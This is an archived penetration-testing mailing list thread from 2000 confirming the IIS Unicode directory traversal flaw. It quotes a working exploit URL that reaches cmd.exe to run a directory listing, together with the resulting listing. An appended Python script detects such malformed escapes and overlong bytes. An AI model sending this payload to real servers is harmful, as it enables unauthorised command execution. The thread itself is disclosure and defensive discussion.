Penetration Testing mailing list archives

Re: [PEN-TEST] IIS UNICODE Strings


From: Unicraft Systems <unicraft () OTERO CL>
Date: Tue, 31 Oct 2000 20:46:37 -0300

It works for me too!!!   =)
This was tested in an NT 4 SP6 server.


Regards,
DonSata

-----Original Message-----
From: Penetration Testers [mailto:PEN-TEST () SECURITYFOCUS COM]On Behalf Of
Mike Ahern
Sent: Tuesday, October 31, 2000 8:14 PM
To: PEN-TEST () SECURITYFOCUS COM
Subject: Re: [PEN-TEST] IIS UNICODE Strings

Vitaly Osipov [vos () TELENOR CZ] wrote:
Hmm... I see some *very* strange strings in your
examples below... the second escaped symbol (%pc for
example) is not a real escaped hex-code - if it works,
then the problem is not in Unicode at all, but in
something else
---------------------------


Trust Me, It Works!!! Which is interesting since at
least one system reported as patched appears to be
still vulnerable. I had assumed the admin either
didn't patch, or used the wrong hotfix. Perhaps that
is not the case...

The Proof is in the Pudding:
----------------------------

http://10.X.X.X/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
 Directory of c:\

06/23/00  01:38p                     0 AUTOEXEC.BAT
06/23/00  01:38p                     0 CONFIG.SYS
06/23/00  01:40p        <DIR>          Dell
06/26/00  03:29p        <DIR>          INetPub
06/26/00  02:10p        <DIR>          MSSQL7
06/26/00  01:40p        <DIR>          Multimedia Files
06/26/00  03:14p        <DIR>          My Installations
06/27/00  01:05p        <DIR>          Program Files
06/30/00  09:00a        <DIR>          TEMP
07/10/00  11:42a        <DIR>          WINNT


 -mch
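
A defensive check for the two oddities discussed in this thread, as an added example that is not part of the original messages: it flags request paths that contain a `%` not followed by two hex digits (such as `%pc`) or the bytes 0xC0/0xC1, which never occur in well-formed UTF-8. The names `audit_target` and `SAMPLES` are hypothetical, and the sample targets are constructed, the first reusing the URL quoted above.

```python
import re

HEX2 = re.compile(r"[0-9A-Fa-f]{2}")

# Constructed sample request targets; the first is the URL path quoted in the thread.
SAMPLES = [
    "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\\",
    "/docs/caf%C3%A9.html",      # valid UTF-8 escape sequence
    "/images/../logo.gif",       # plain relative segment, no escapes
    "/default.asp?id=7",
]

def audit_target(target):
    """Return a list of findings for the path part of a request target."""
    path = target.split("?", 1)[0]          # only the path is audited
    findings, raw, i = [], bytearray(), 0
    while i < len(path):
        ch = path[i]
        if ch == "%":
            pair = path[i + 1:i + 3]
            if HEX2.fullmatch(pair):        # well-formed %XX escape
                raw.append(int(pair, 16))
                i += 3
                continue
            # '%' followed by something other than two hex digits
            findings.append("malformed-escape:%" + pair)
        raw.extend(ch.encode("utf-8"))
        i += 1
    # 0xC0 and 0xC1 could only begin a two-byte encoding of a code point
    # below U+0080 (an overlong form), so valid UTF-8 never contains them.
    for b in raw:
        if b in (0xC0, 0xC1):
            findings.append("overlong-lead-byte:%02x" % b)
    try:
        raw.decode("utf-8")                 # strict decode of the unescaped bytes
    except UnicodeDecodeError:
        findings.append("invalid-utf8")
    if ".." in path:
        findings.append("dot-dot-in-path")
    return findings

def audit_all(targets):
    """Map each target to its findings, keeping only the flagged ones."""
    return {t: f for t in targets if (f := audit_target(t))}

if __name__ == "__main__":
    for target, found in audit_all(SAMPLES).items():
        print(target, "->", ", ".join(found))
```
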


